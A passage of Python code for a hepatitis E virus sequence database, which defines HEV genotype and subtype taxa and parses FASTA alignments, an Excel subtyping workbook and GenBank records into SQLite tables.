rank_MajorClade = ct.rank('major clade', rGenotype)\n maI = ct.taxa('I' , 'HEV-g3-I' , rank_MajorClade, g3)\n maII = ct.taxa('II' , 'HEV-g3-II' , rank_MajorClade, g3)\n Rab = ct.taxa('3ra', 'HEV-g3-rabbit', rank_MajorClade, g3)\n\n rank_Group = ct.rank('group', rank_MajorClade)\n grchi = ct.taxa('3chi' , 'HEV-g3chi' , rank_Group, maI)\n grjab = ct.taxa('3jab' , 'HEV-g3jab' , rank_Group, maI)\n grfeg = ct.taxa('3feg' , 'HEV-g3feg' , rank_Group, maII)\n grRab = ct.taxa('3rab' , 'HEV-g3rabbit' , rank_Group, Rab, syn=['Rab'] ) # temporal???\n\n rSubtype = ct.rank('subtype', rank_Group)\n\n g1a = ct.taxa('1a', 'HEV-g1a' , rSubtype, g1, syn=['a', 'Ia', 'IA'])\n g1b = ct.taxa('1b', 'HEV-g1b' , rSubtype, g1)\n g1c = ct.taxa('1c', 'HEV-g1c' , rSubtype, g1)\n g1d = ct.taxa('1d', 'HEV-g1d' , rSubtype, g1, syn=['d'])\n g1e = ct.taxa('1e', 'HEV-g1e' , rSubtype, g1)\n g1f = ct.taxa('1f', 'HEV-g1f' , rSubtype, g1)\n g1g = ct.taxa('1g', 'HEV-g1g' , rSubtype, g1)\n g1h = ct.taxa('1h', 'HEV-g1h' , rSubtype, g1)\n g1i = ct.taxa('1i', 'HEV-g1i' , rSubtype, g1)\n g1j = ct.taxa('1j', 'HEV-g1j' , rSubtype, g1)\n g1k = ct.taxa('1k', 'HEV-g1k' , rSubtype, g1)\n\n g2a = ct.taxa('2a', 'HEV-g2a' , rSubtype, g2)\n\n g3a = ct.taxa('3a', 'HEV-g3a' , rSubtype, grjab, syn=['a'])\n g3b = ct.taxa('3b', 'HEV-g3b' , rSubtype, grjab)\n g3c = ct.taxa('3c', 'HEV-g3c' , rSubtype, grchi, syn=['c', 'G3c'])\n g3d = ct.taxa('3d', 'HEV-g3d' , rSubtype, g3, syn=['d'])\n g3e = ct.taxa('3e', 'HEV-g3e' , rSubtype, grfeg, syn=['e', 'g3e', 'G3E', '3E'])\n g3ef = ct.taxa('3ef', 'HEV-g3ef', rSubtype, grfeg )\n g3f = ct.taxa('3f', 'HEV-g3f' , rSubtype, grfeg, syn=['f', 'g3f', 'G3F', '3F', '515413', '515412']) # human/3f/Fr-27/France/2006, Fr-26/France/2006\n g3g = ct.taxa('3g', 'HEV-g3g' , rSubtype, grfeg)\n g3h = ct.taxa('3h', 'HEV-g3h' , rSubtype, grchi, syn=['h', 'g3h', 'G3H', '3H'])\n g3i = ct.taxa('3i', 'HEV-g3i' , rSubtype, grchi)\n g3j = ct.taxa('3j', 'HEV-g3j' , rSubtype, grjab)\n g3k = ct.taxa('3k', 'HEV-g3k' , rSubtype, g3)\n g3l = ct.taxa('3l', 'HEV-g3l' , rSubtype, g3)\n\n g4a = ct.taxa('4a', 'HEV-g4a' , rSubtype, g4)\n 
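# remaining HEV genotype-4 subtypes (4b-4k); one taxa row per subtype, as for genotype 3 above\n    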
g4b = ct.taxa('4b', 'HEV-g4b' , rSubtype, g4)\n g4c = ct.taxa('4c', 'HEV-g4c' , rSubtype, g4)\n g4d = ct.taxa('4d', 'HEV-g4d' , rSubtype, g4, syn=['d'])\n g4e = ct.taxa('4e', 'HEV-g4e' , rSubtype, g4)\n g4f = ct.taxa('4f', 'HEV-g4f' , rSubtype, g4)\n g4g = ct.taxa('4g', 'HEV-g4g' , rSubtype, g4)\n g4h = ct.taxa('4h', 'HEV-g4h' , rSubtype, g4, syn=['h'])\n g4i = ct.taxa('4i', 'HEV-g4i' , rSubtype, g4)\n g4j = ct.taxa('4j', 'HEV-g4j' , rSubtype, g4)\n g4k = ct.taxa('4k', 'HEV-g4k' , rSubtype, g4)\n\n db.commit()\n\n\ndef build_ref_pos(Seq, beg, end, Al_len):\n sr=0\n ref = [sr]*beg\n for b in Seq:\n if (b != '-'): sr+=1\n ref.append(sr)\n ref += [sr]*(Al_len - end-1)\n return ref\n\n\ndef parse_full_fasta_Align(db, ref_seq = None, file_name=None):\n \"\"\"Will parse an alignment and insert it into the tables:\n files: the file path ,\n align:\n seq: because assume this sequences are all complete original sequences (but may be a partial sequence from\n some isolate ! )\n\n \"\"\"\n if not file_name:\n file_name = filedialog.askopenfilename(filetypes=((\"fasta aligment\", \"*.fas\"), (\"All files\", \"*.*\")),\n defaultextension='fas',\n title='Select Master Alignment')\n if not file_name:\n return\n\n # self.refSeq.clear()\n print(file_name)\n\n c = db.cursor()\n c.execute(\"INSERT INTO seq_file (path, format) VALUES (?, 'fasta')\", (file_name,))\n\n Id_file = c.lastrowid\n c.execute(\"INSERT INTO align (Id_file, Name, Ref ) \"\n \" VALUES (?, ?, ? )\",\n (Id_file, file_name, ref_seq ) )\n\n Id_align = c.lastrowid\n max_len = 0\n for seq_record in SeqIO.parse(file_name, \"fasta\"):\n # print(seq_record.id, len(seq_record) )\n seq = str(seq_record.seq)\n if ref_seq is None: # set first seq as reference\n ref_seq = seq_record.id\n al_ref_seq = seq\n else:\n if ref_seq == seq_record.id:\n al_ref_seq = seq\n ln = len( seq)\n if max_len < ln: max_len = ln\n seq_beg = 0\n seq_end = ln - 1\n while seq_beg < ln:\n if seq[seq_beg] == '-':\n seq_beg += 1\n else:\n break\n while seq_end > seq_beg:\n if seq[seq_end] == '-':\n seq_end -= 1\n else:\n break\n\n seq = str( seq[seq_beg: seq_end + 1])\n\n c.execute(\"SELECT Id_seq FROM seq WHERE seq.Name=?\", (str(seq_record.id),)) # (record.organism,))\n Id_part = c.fetchone()\n Id_part = Id_part[0] if Id_part else None\n if not Id_part:\n exp_seq = seq.replace('-','') #''.join([base for base in seq if base != '-'])\n\n c.execute(\"INSERT INTO seq (Name, Seq, Len ) \"\n \" VALUES (?, ?, ? )\",\n (str(seq_record.id), exp_seq, len(exp_seq)) )\n Id_part = c.lastrowid\n # todo revise: Id_seq_region or Id_part ?????\n c.execute(\"INSERT INTO aligned_seq (Id_align, Id_seq_region, Seq, pbeg, pend ) \"\n \" VALUES (?, ?, ?, ?, ? )\",\n (Id_align, Id_part, seq, seq_beg, seq_end ) )\n\n c.execute(\"UPDATE align SET Al_len = ?, Ref=? WHERE Id_align=?\",\n ( max_len , ref_seq, Id_align ) )\n db.commit()\n return Id_align , build_ref_pos(al_ref_seq,0,len(al_ref_seq)-1, max_len)\n\n\ndef ref_pos(sdb, ID_align, seq_name=None):\n c = sdb.cursor()\n c.execute(\"SELECT Al_len, Ref FROM align WHERE Id_align=? \", (ID_align, ))\n Al_len, Ref = c.fetchone()\n if not seq_name: seq_name = Ref\n c.execute(\"SELECT aligned_seq.Seq, pbeg, pend FROM aligned_seq, Seq \"\n \"ON Id_part=Id_seq WHERE Name=? 
AND Id_align=?\",\n              (seq_name, ID_align ))\n    Seq, beg, end = c.fetchone()\n    return build_ref_pos(Seq, beg, end, Al_len)\n\n\ndef parse_row(db, row, col):\n    # sync one Excel row: find the seq, then create or update its strain and isolate\n    success = True\n    MEGA_name = row[col['MEGA name']].value\n    genotype = row[col['genotype']].value\n    subtype = row[col['subtype']].value\n    group = row[col['group']].value\n    Str_name = row[col['Str.name']].value\n    Isolate = row[col['Isolate']].value\n    # Country = row[col['Country' ]].value\n    Country_cod3=row[col['Country cod']].value\n    Region =row[col['region']].value # 'H ' todo: deduced\n    Region_full=row[col['region full']].value\n    Host =row[col['Host']].value\n    Source =row[col['Source']].value\n    Year =row[col['Y']].value\n    Month =row[col['M']].value\n    Day =row[col['D']].value\n    Institut =row[col['Inst']].value\n    Reference =row[col['reference']].value\n    Lu_Li =row[col['Lu, Li']].value\n    CG =row[col['CG']].value\n\n    c = db.cursor()\n    taxa = subtype if subtype else group if group else genotype\n    c.execute(\"SELECT Id_taxa FROM taxa WHERE taxa.Name=?\", (taxa, )) # ?? Name UNIQUE ??\n    Id_taxa = c.fetchone()\n    Id_taxa = Id_taxa[0] if Id_taxa else None\n\n    if not Isolate: Isolate = Str_name\n\n    Id_strain = None\n    Id_isolate = None\n    Id_seq = None\n    strain_Name = None\n    isolate_Name = None\n\n    # let's assume the normal situation where the seq name exists, and examine strain and isolate.\n    c.execute(\"\"\"\n              select seq.Id_seq, \n                     strain.Id_strain, strain.Name, \n\t             isolate.Id_isolate, isolate.Name \n\n              from seq \n              left join isolate_seq USING(Id_seq)\n              left join strain USING(Id_strain) \n              left join isolate USING(Id_isolate)\n\t\n              where seq.Name = ?\n              \"\"\"\n              , ( MEGA_name, ))\n\n    select = c.fetchone()\n    if select:\n        Id_seq, Id_strain, strain_Name, Id_isolate, isolate_Name = select\n    else:\n        # there is no such seq yet, but there could still be a strain and an isolate\n        print('Unregistered seq ', MEGA_name)\n\n    if not Id_strain:\n        c.execute(\"select Id_strain from strain where Name = ?\", (Str_name,))\n        Id_strain = c.fetchone()\n        if Id_strain:\n            Id_strain = Id_strain[0]\n            c.execute(\"select Id_isolate from isolate where Id_strain = ? and Name=?\"\n                      , (Id_strain, Isolate))\n            Id_isolate = c.fetchone()\n            Id_isolate = Id_isolate[0] if Id_isolate else None\n\n    if Id_strain:\n        if not strain_Name or Str_name != strain_Name:\n            print('Renaming? strain of seq ', MEGA_name, ' from ', strain_Name, ' to ', Str_name)\n            if not Str_name:\n                Str_name = strain_Name # the same with the other fields !!!!!\n        st = strain_Name if strain_Name else Str_name\n        # update strain\n        c.execute(\"UPDATE strain SET Name=? , Id_taxa=?, year=?, host=?, source=?, country_iso3=? where Id_strain=? \"\n                  , (st , Id_taxa , Year , Host , Source , Country_cod3, Id_strain ) )\n    else:\n        # create strain\n        print('New Strain:', Str_name)\n        c.execute(\"INSERT INTO strain (Name , Id_taxa, host, source, year, country_iso3) \"\n                  \" VALUES (? , ? , ? , ? , ? , ? ) \",\n                  (Str_name, Id_taxa, Host, Source, Year, Country_cod3))\n        Id_strain = c.lastrowid\n\n    if Id_isolate:\n        if not isolate_Name or Isolate != isolate_Name:\n            print('Renaming? isolate of seq ', MEGA_name, ' from ', isolate_Name, ' to ', Isolate)\n            if not Isolate:\n                Isolate = isolate_Name # the same with the other fields !!!!!\n\n        iso = isolate_Name if isolate_Name else Isolate\n        c.execute(\"UPDATE isolate SET Name=?, Id_strain=?, year=?, month=?, day=?, host=?, source=?, institution=?, country_iso3=?, region=?, region_full=? where Id_isolate=? 
\"\n , (iso, Id_strain , Year , Month , Day , Host , Source , Institut , Country_cod3 , Region , Region_full, Id_isolate ))\n else:\n c.execute(\n \"INSERT INTO isolate (Name , Id_strain, Year , Month , Day, host, source, institution, country_iso3, region, region_full ) \"\n \" VALUES (? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? ) \"\n , (Isolate, Id_strain, Year , Month , Day, Host, Source, Institut , Country_cod3, Region, Region_full ))\n Id_isolate = c.lastrowid\n\n # create isolate_seq and strain_isolate\n c.execute(\"INSERT INTO isolate_seq (authority, Id_isolate, Id_seq, Id_strain, Id_taxa, Name , Year , Month , Day, host, source, country_iso3, region, region_full ) \"\n \"VALUES ('AV' , ? ,? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? ) \"\n , ( Id_isolate, Id_seq, Id_strain, Id_taxa, Isolate, Year , Month , Day, Host, Source, Country_cod3, Region, Region_full ))\n Id_isolate_seq= c.lastrowid\n\n c.execute(\"INSERT INTO strain_isolate (authority, Id_strain, Name , Id_isolate_seq) \"\n \" VALUES ('AV' , ? , ? , ? ) \",\n ( Id_strain, Str_name, Id_isolate_seq))\n\n # todo: revise this. Is general??\n c.execute(\"SELECT Id_algseq FROM aligned_seq WHERE Id_part=?\", (Id_seq,))\n Id_algseq= c.fetchone()\n Id_algseq = Id_algseq[0] if Id_algseq else None\n\n if Id_algseq is None:\n #success = abnormal_row(c, row)\n c.execute(\"INSERT INTO pending_seq (Id_taxa, Name, Id_seq, Id_isolate) VALUES (?,?,?,?)\",\n (Id_taxa, MEGA_name, Id_seq, Id_isolate))\n\n # print(\"Abnormal row !!!!! \", MEGA_name, subtype, Str_name,\n # \"-------> Taxa:{0}, Alseq:{1}, Seq:{2}\".format(Id_taxa, Id_algseq, Id_seq))\n success = False\n else:\n c.execute(\"INSERT INTO classified_seq (Id_taxa, Id_algseq) VALUES (?,?) \"\n , (Id_taxa, Id_algseq) )\n # if c.rowcount == 0: return abnormal_row(c, row)\n\n rfs = []\n if Lu_Li : rfs.append( 'Lu' )\n if Reference : rfs.append( 'VR' )\n if Reference=='R': rfs.append( 'ICVT')\n # print (rfs)\n for rf in rfs:\n # print ('Add scheme: ',Id_taxa , rf , Id_seq, MEGA_name )\n c.execute(\"INSERT INTO ref_seq (Id_taxa, Id_ref_schema , Id_seq, name ) \"\n \" VALUES (? , (SELECT Id_ref_schema FROM ref_schema WHERE schema=?), ? , ? 
) \"\n              , (Id_taxa, rf , Id_seq, MEGA_name ))\n\n    # db.commit()\n    return success\n\n\ndef parse_HEV_xlsm(db, file_name=None):\n    print('openpyxl...')\n    import openpyxl\n\n    if not file_name:\n        file_name = filedialog.askopenfilename(filetypes=((\"Excel files\", \"*.xlsm\"), (\"All files\", \"*.*\")),\n                                               defaultextension='xlsm',\n                                               title='Select HEV isolate subtyping data')\n    if not file_name:\n        return\n\n    # self.refSeq.clear()\n    print(file_name)\n\n    wb = openpyxl.load_workbook(file_name)\n    print(wb.sheetnames)\n\n    ws = wb['Seq-class'] # 2 ('Seq-class')\n    first = True\n    error = False\n    col=dict()\n    for r in ws.iter_rows() :\n        if first:\n            for c in range(25): # make a dict with the first 25 column headers\n                col[r[c].value]=c\n            first = False\n        else:\n            error |= not parse_row(db,r,col)\n    if error:\n        print('There were errors during parsing the Excel file !!!!!!!!!!!!!!')\n\n    db.commit()\n\n\ndef clean_parsed_Excel(db):\n    c = db.cursor()\n    c.execute(\"DELETE FROM strain\") # ??\n    c.execute(\"DELETE FROM isolate\") # ??\n    c.execute(\"DELETE FROM isolate_seq\") # ??\n    c.execute(\"DELETE FROM pending_seq\") # ??\n    c.execute(\"DELETE FROM classified_seq\") # ??\n    db.commit()\n\n\ndef parseGB(db, GB_flat_file=None):\n    '''\n    Load and parse a GenBank sequence flat file\n    :return:\n    '''\n    if not GB_flat_file:\n        GB_flat_file = filedialog.askopenfilename(filetypes=((\"Seq flat GB\", \"*.gb\"), (\"All files\", \"*.*\") ),\n                                                  title='Parse the GenBank sequences in flat format')\n    print(GB_flat_file)\n\n    c = db.cursor()\n    Id_genotype = rank_ID(c, 'genotype')\n    Id_subtype = rank_ID(c, 'subtype')\n\n    # no real need to save this info\n    c.execute(\"INSERT INTO seq_file (path, format) VALUES (?, 'GB_flat')\", (GB_flat_file,))\n    Id_file = c.lastrowid\n    with open(GB_flat_file) as GB_flat:\n        prev_sub_auth = None\n        prev_sub_jour = None\n        prev_sub_ID = None\n        prev_sub_ref = None\n        for record in GenBank.parse(GB_flat):\n\n            # record.locus : locus - The name specified after the LOCUS keyword in the GenBank\n            # record. This may be the accession number, or a clone id or something else.\n\n            Name = record.accession[0] if record.accession else record.locus\n            strain = None # record.locus ??\n            isolate = None\n            host = None\n            country = None # collection country, NOT author country\n            region = None # collection region, NOT author country\n            collection_date = None\n            year = None\n            month = None\n            day = None\n            source = None\n            genotype = None\n            subtype = None\n            NCBI_TaxID = None\n\n            # let's assume the normal situation where we are inserting a new seq\n            try:\n                c.execute(\"INSERT INTO seq (Name, Seq , Len )\"\n                          \" VALUES (?, ? , ? 
)\",\n                          (Name, str(record.sequence), len(record.sequence)))\n                Id_seq = c.lastrowid\n\n            except sqlite3.IntegrityError:\n                print('Attempt to duplicate seq ', Name)\n                continue\n\n            # http://biopython.org/DIST/docs/api/Bio.GenBank.Record-pysrc.html#Feature\n            for feature in record.features:\n                if feature.key == 'source':\n                    # http://biopython.org/DIST/docs/api/Bio.GenBank.Record.Qualifier-class.html\n                    for q in feature.qualifiers:\n\n                        if q.key == '/strain=':\n                            strain = q.value[1:-1].strip()\n\n                        elif q.key == '/isolate=':\n                            isolate = q.value[1:-1].strip()\n\n                        elif q.key == '/country=':\n                            country = q.value[1:-1].split(':')\n                            if len(country) > 1:\n                                region = country[1].strip() # ok?\n                            country = country[0].strip()\n\n                        elif q.key == '/collection_date=':\n                            collection_date = q.value[1:-1].strip()\n                            year, month, day = parse_date(collection_date)\n\n                        elif q.key == '/source=' or q.key == '/isolation_source=':\n                            source = q.value[1:-1].strip()\n\n                        elif q.key == '/host=':\n                            host = q.value[1:-1]\n\n                        elif q.key == '/db_xref=': # example value= taxon:509628\n                            val = q.value[1:-1]\n                            m = val.split(':')\n                            if m[0].startswith ('taxon'):\n                                NCBI_TaxID = m[1].strip()\n\n                        elif q.key == '/note=':\n                            val = q.value[1:-1]\n                            genotype, subtype = parse_GB_note(val)\n\n\n            authors = None\n            unp_aut = None\n            references = []\n            title = None\n            sub_date = None\n            institution = None\n            Id_submission = None\n            p_authors = None\n            p_country = None\n            p_journal = None\n\n            for rf in record.references:\n\n                if rf.title == 'Direct Submission':\n                    if prev_sub_auth == rf.authors and prev_sub_jour == rf.journal:\n                        Id_submission = prev_sub_ID\n                        references = prev_sub_ref\n                        break\n                    else:\n                        p_authors = rf.authors\n                        p_journal = rf.journal\n                        institution = p_journal[24:]\n\n                elif rf.journal == 'Unpublished':\n                    title = rf.journal\n                    unp_aut = rf.authors\n\n                else:\n                    references.append(rf)\n\n            if not Id_submission: # if not like the previous ...\n                # look for these authors in existing submissions in the DB\n                for ID, tl in c.execute(\"SELECT Id_submission, title FROM submission WHERE authors=? \", (p_authors, )):\n                    if tl == title: # with the same title it will be the same submission\n                        Id_submission = ID\n                        break\n                    elif title:\n                        continue\n                    else:\n                        for rf in references: # the submission could use the title of one of the references\n                            if tl == rf.title:\n                                title = rf.title\n                                Id_submission = ID\n                                break\n\n                if not Id_submission and p_journal: # is a new submission that we can build\n                    sub_date = p_journal[11:23] # todo: parse ???\n                    p_country = institution.split(',')[-1]\n                    if not title:\n                        title = references[0].title if references else None # let's take the title of the first reference\n                    c.execute(\n                        \"INSERT INTO submission ( title, sub_date, authors , country_iso3 )\"\n                        \" VALUES ( ? , ? , ? , (SELECT iso3 FROM countries WHERE name=? ) )\",\n                        ( title, sub_date, p_authors, p_country ) )\n                    Id_submission = c.lastrowid\n                    prev_sub_auth = p_authors # now this will be the prev sub\n                    prev_sub_jour = p_journal\n                    prev_sub_ID = Id_submission\n                    prev_sub_ref = references\n\n            for rf in references: # very often this is empty. Add to every seq referenced\n                try:\n                    c.execute(\n                        \"INSERT INTO reference ( title , authors, journal , medline_id, number, pubmed_id, remark) \"\n                        \" VALUES ( ? , ? , ? , ? , ? , ? , ? )\",\n                        ( rf.title, rf.authors, rf.journal, rf.medline_id, rf.number, rf.pubmed_id, rf.remark))\n                    reference_id = c.lastrowid\n\n                except sqlite3.IntegrityError:\n                    c.execute(\"SELECT reference_id FROM reference WHERE title=? AND authors=? 
AND journal=?\",\n (rf.title, rf.authors, rf.journal))\n reference_id = c.fetchone()[0]\n # reference_id = reference_id[0] if reference_id else reference_id\n\n c.execute(\n \"INSERT INTO reference_to_seq ( location, reference_id , Id_seq ) \"\n \" VALUES ( ? , ? , ? )\",\n (rf.bases, reference_id , Id_seq ))\n\n Id_taxa = find_ID_Taxa(c, NCBI_TaxID, genotype, subtype, Id_genotype, Id_subtype)\n # Id_rank = rank_ID_taxa(c, Id_taxa)\n\n c.execute(\"SELECT iso3 FROM countries LEFT JOIN country_names USING (iso3) \"\n \"WHERE countries.name=? or countries.full_name=? OR country_names.name=?\", (country, country, country))\n country_iso3 = c.fetchone()\n if not country_iso3:\n if country: print('Not found country: ', country)\n elif region: print('Seq ', Name, ' have no country, but region:', region)\n country_iso3 = None\n else:\n country_iso3 = country_iso3[0]\n\n\n host_t, source_t = parse_source(host, source)\n # print('host_t, source_t = parse_source(host, source): ', host_t, source_t, host, source)\n # todo: parse location. Is unique?\n\n isolate, strain = reuse_GBdefinition_to_find_strain_isolate(record.definition, isolate, strain)\n if not strain: strain = isolate\n if not isolate: isolate = strain\n if not strain:\n strain = Name\n isolate = record.locus\n\n # there could be strain and isolate, unfortunately most of the time with the same name\n Id_strain = None\n Id_isolate = None\n\n c.execute(\"select Id_strain from strain where Name = ?\", (strain,))\n Id_strain = c.fetchone()\n\n if not Id_strain:\n # the normal situation: a new strain\n c.execute(\"INSERT INTO strain (Name , Id_taxa, host , source , year, country_iso3) \"\n \" VALUES (? , ? , ? , ? , ? , ? ) \",\n (strain, Id_taxa, host_t, source_t, year, country_iso3))\n Id_strain = c.lastrowid\n else:\n # TENTATIVELY we considere it is the same strain, just these strain have seq already\n # print('Existing Strain:', strain, Id_strain ) # todo: check this !!!\n # c.execute(\"UPDATE strain (Name) VALUES (?) \", (strain,)) # todo: update here !!!!!!!!\n # todo: for example - a more precise genotyping\n # Id_strain = c.lastrowid\n # print(' new Id_strain:', Id_strain, )\n Id_strain = Id_strain[0]\n\n # select other fields to update if possible\n c.execute(\"select Id_isolate from isolate where Id_strain = ? and Name=?\"\n , ( Id_strain, isolate ) )\n Id_isolate = c.fetchone()\n if Id_isolate:\n # a new seq for that isolate of that strain\n # print('Existing isolate:', isolate, Id_isolate )\n # c.execute(\"UPDATE isolate (Name) VALUES (?) \", ( isolate,)) # todo: update here !!!!!!!!\n # Id_isolate = c.lastrowid\n Id_isolate = Id_isolate[0]\n\n if not Id_isolate:\n # normal situation: a new isolate for that strain\n c.execute(\n \"INSERT INTO isolate (Name , Id_strain, col_date , Year , Month , Day, host , source , authors , institution, country_iso3, region_full ) \"\n \" VALUES (? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? ) \"\n , (isolate, Id_strain, collection_date, year , month , day, host_t, source_t, p_authors, institution, country_iso3, region))\n Id_isolate = c.lastrowid\n\n # create isolate_seq and strain_isolate\n c.execute(\"INSERT INTO isolate_seq (authority, Id_isolate, Id_seq, Id_submission, Id_strain, Id_taxa, Name , col_date , year , month , day, host , source , host_ori, source_ori, country_iso3, region_full) \"\n \"VALUES ('GB' , ? ,? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? 
) \"\n , ( Id_isolate, Id_seq, Id_submission, Id_strain, Id_taxa, isolate, collection_date, year , month , day, host_t, source_t, host , source , country_iso3, region ))\n Id_isolate_seq= c.lastrowid\n\n c.execute(\"INSERT INTO strain_isolate (authority, Id_strain, Name , Id_isolate_seq) \"\n \" VALUES ('GB' , ? , ? , ? ) \",\n ( Id_strain, strain, Id_isolate_seq) )\n\n c.execute(\"INSERT INTO pending_seq (Name, Id_taxa, description , Id_isolate, Id_seq) \"\n \" VALUES (? , ? , ? , ? , ?) \",\n (Name, Id_taxa, record.definition, Id_isolate, Id_seq))\n\n db.commit()\n\n\ndef find_ID_Taxa(db_cursor, NCBI_TaxID, genotype, subtype, Id_genotype, Id_subtype ):\n #taxa = subtype if subtype else genotype\n NCBI_Taxa_ID = None\n genotype_Taxa_ID = None\n subtype_Taxa_ID = None\n\n if NCBI_TaxID:\n db_cursor.execute(\"SELECT Id_taxa FROM taxa_names WHERE Name=?\", (NCBI_TaxID,))\n NCBI_Taxa_ID= db_cursor.fetchone() # unique ??\n if not NCBI_Taxa_ID:\n print('No NCBI_Id found: NCBI_TaxID, genotype, subtype -> ', NCBI_TaxID, genotype, subtype)\n NCBI_Taxa_ID = None\n elif len(NCBI_Taxa_ID)!=1:\n print('Multiple NCBI_Id found: NCBI_Taxa_ID, NCBI_TaxID, genotype, subtype -> ', NCBI_Taxa_ID, NCBI_TaxID, genotype, subtype)\n NCBI_Taxa_ID = None\n else:\n NCBI_Taxa_ID = NCBI_Taxa_ID[0]\n\n if genotype:\n if NCBI_Taxa_ID:\n db_cursor.execute(\"SELECT Id_taxa FROM taxa_names JOIN taxa USING(Id_taxa) JOIN taxa_parents USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? AND taxa.Id_rank=? AND taxa_parents.parent=?\",\n ( genotype, Id_genotype, NCBI_Taxa_ID) )\n else:\n db_cursor.execute(\"SELECT Id_taxa FROM taxa_names JOIN taxa USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? AND taxa.Id_rank=? \",\n ( genotype, Id_genotype ))\n genotype_Taxa_ID = db_cursor.fetchone() # unique ??\n if not genotype_Taxa_ID:\n if not subtype:\n #print('Swap genotype to subtype: NCBI_TaxID, genotype, subtype -> ', NCBI_TaxID, genotype, subtype)\n return find_ID_Taxa(db_cursor, NCBI_TaxID, None, genotype, Id_genotype, Id_subtype )\n print('Genotype not found: NCBI_TaxID, genotype, subtype -> ', NCBI_TaxID, genotype, subtype)\n genotype_Taxa_ID = None\n elif len(genotype_Taxa_ID)!=1:\n print('Multiple genotype found: genotype_Taxa_ID, NCBI_TaxID, genotype, subtype -> ',\n genotype_Taxa_ID, NCBI_TaxID, genotype, subtype)\n genotype_Taxa_ID = None\n else:\n genotype_Taxa_ID = genotype_Taxa_ID[0]\n\n if subtype:\n if genotype_Taxa_ID:\n if NCBI_Taxa_ID:\n db_cursor.execute(\n \"SELECT Id_taxa FROM taxa_names \"\n \" JOIN taxa USING(Id_taxa) \"\n \" JOIN taxa_parents AS pg USING(Id_taxa) \"\n \" JOIN taxa_parents AS pn USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? \"\n \" AND taxa.Id_rank=? \"\n \" AND pg.parent=?\"\n \" AND pn.parent=?\",\n (subtype, Id_subtype, genotype_Taxa_ID, NCBI_Taxa_ID))\n else:\n db_cursor.execute(\n \"SELECT Id_taxa FROM taxa_names \"\n \" JOIN taxa USING(Id_taxa) \"\n \" JOIN taxa_parents AS pg USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? \"\n \" AND taxa.Id_rank=? \"\n \" AND pg.parent=?\",\n (subtype, Id_subtype, genotype_Taxa_ID))\n else:\n if NCBI_Taxa_ID:\n db_cursor.execute(\n \"SELECT Id_taxa FROM taxa_names \"\n \" JOIN taxa USING(Id_taxa) \"\n \" JOIN taxa_parents AS pn USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? \"\n \" AND taxa.Id_rank=? \"\n \" AND pn.parent=?\",\n (subtype, Id_subtype, NCBI_Taxa_ID))\n else:\n db_cursor.execute(\n \"SELECT Id_taxa FROM taxa_names \"\n \" JOIN taxa USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? \"\n \" AND taxa.Id_rank=? 
\",\n                    (subtype, Id_subtype))\n\n        subtype_Taxa_ID = db_cursor.fetchone() # unique ??\n        if not subtype_Taxa_ID:\n            print('No subtype found: NCBI_TaxID, genotype, subtype -> ', NCBI_TaxID, genotype, subtype)\n            subtype_Taxa_ID = None\n        elif len(subtype_Taxa_ID) != 1:\n            print('Multiple subtype found: subtype_Taxa_ID, NCBI_TaxID, genotype, subtype -> ',\n                  subtype_Taxa_ID, NCBI_TaxID, genotype, subtype)\n            subtype_Taxa_ID = None\n        else:\n            subtype_Taxa_ID = subtype_Taxa_ID[0]\n\n    if subtype_Taxa_ID :\n        return subtype_Taxa_ID\n\n    if genotype_Taxa_ID:\n        return genotype_Taxa_ID\n    elif genotype:\n        return find_ID_Taxa(db_cursor, NCBI_TaxID, None, genotype, Id_genotype, Id_subtype )\n\n    if NCBI_Taxa_ID : return NCBI_Taxa_ID\n\n\ndef reuse_GBdefinition_to_find_strain_isolate(definition, isolate, strain):\n    if 'isolate' in definition:\n        iso = definition.split('isolate')[1].split(',')[0]\n        if iso[0] == ':':\n            iso = iso[1:].strip()\n        iso = iso.split()[0].strip()\n        if iso[-1] == '.':\n            iso = iso[:-1].strip()\n        if isolate == '':\n            isolate = iso\n        else:\n            if isolate != iso:\n                isolate = isolate + ' or ' + iso\n    if 'strain' in definition:\n        st = definition.split('strain')[1].split(',')[0]\n        if st[0] == ':':\n            st = st[1:].strip()\n        st = st.split()[0].strip()\n        if st[-1] == '.':\n            st = st[:-1].strip()\n        if not strain:\n            strain = st\n        else:\n            if strain != st:\n                strain = strain + ' or ' + st\n    return isolate, strain\n\n\ndef parse_GB_note(note):\n    # print('Note=', note)\n    genotype, subtype = None, None\n    for n in note.split(';'):\n        m = n.split() #\n        if len(m) == 1:\n            m = m[0].split(':')\n        if len(m) == 1:\n            m = m[0].split('-')\n        if m[0].lower().startswith ('genotype'):\n            genotype = m[1].strip()\n        elif m[0].lower().startswith ('subtype'):\n            subtype = m[1].strip()\n    return genotype, subtype\n\n\ndef parse_date(date :str):\n    L=len(date)\n\n    try:\n\n        if L == 11 : # 02-Mar-2010\n            d=datetime.datetime.strptime(date, '%d-%b-%Y')\n            return d.year, d.month, d.day\n\n        elif L == 4 : # 2011\n            return date, None, None\n\n        elif L == 8 : # Sep-2011\n            d=datetime.datetime.strptime(date, '%b-%Y')\n            return d.year, d.month, None\n\n        elif L == 9:\n            d=date.split('/')[0] # 2013/2014\n            return d, None, None\n\n        elif L == 10 : # 2016-05-12\n            d=datetime.datetime.strptime(date, '%Y-%m-%d')\n            return d.year, d.month, d.day\n\n        elif L == 7 : # 2016-05\n            d=datetime.datetime.strptime(date, '%Y-%m')\n            return d.year, d.month, None\n\n        elif L == 3 : # Sep ???????\n            d=datetime.datetime.strptime(date, '%b')\n            return None, d.month, None\n\n        else:\n            raise ValueError\n\n    except ValueError:\n        print('Unable to parse date: ', date, ' of length ', len(date) )\n        return None, None, None\n\ndef parse_source(host:str, source:str):\n    s = None\n    h = None\n    o = None\n    if host:\n        o = host.lower()\n        if source:\n            source = source.lower()\n            o += source\n    else:\n        if source:\n            source = source.lower()\n            o = source\n        else: return None, None\n\n\n\n    if any(syn in o for syn in ['huma', 'homo sapiens', 'patient', 'donor', 'clinical' ]):\n        h = 'human'\n    elif any(syn in o for syn in ['boar', 'sus scrofa']): # wild boar\n        if 'sus 